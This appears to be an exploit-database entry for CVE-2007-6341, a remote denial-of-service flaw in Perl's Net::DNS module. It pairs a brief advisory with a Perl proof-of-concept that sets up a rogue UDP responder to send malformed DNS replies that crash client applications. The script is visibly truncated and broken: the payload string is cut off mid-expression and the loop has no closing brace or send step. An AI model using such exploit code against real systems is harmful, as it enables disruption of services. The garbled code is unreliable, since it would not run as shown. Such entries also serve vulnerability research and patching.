Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service

Related Vulnerabilities: CVE-2007-6341  
Publish Date: 17 Dec 2007
Author: beSTORM

The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses.

Successfully exploiting this issue allows attackers to crash applications that use the affected module.

Net::DNS 0.60 is vulnerable; other versions may also be affected.

# Beyond Security(c)
# Vulnerability found by beSTORM - DNS Server module

use strict;
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1024;
$PORTNO = 5351;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die "socket: $@";
print "Awaiting UDP messages on port $PORTNO\n";

my $oldmsg = "\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61".
while ($sock->recv($newmsg, $MAXLEN)) {
 my($port, $ipaddr) = sockaddr_in($sock->peername);
 $hishost = gethostbyaddr($ipaddr, AF_INET);
 print "Client $hishost said ``$newmsg''\n";
 $oldmsg = "[$hishost] $newmsg";
die "recv: $!";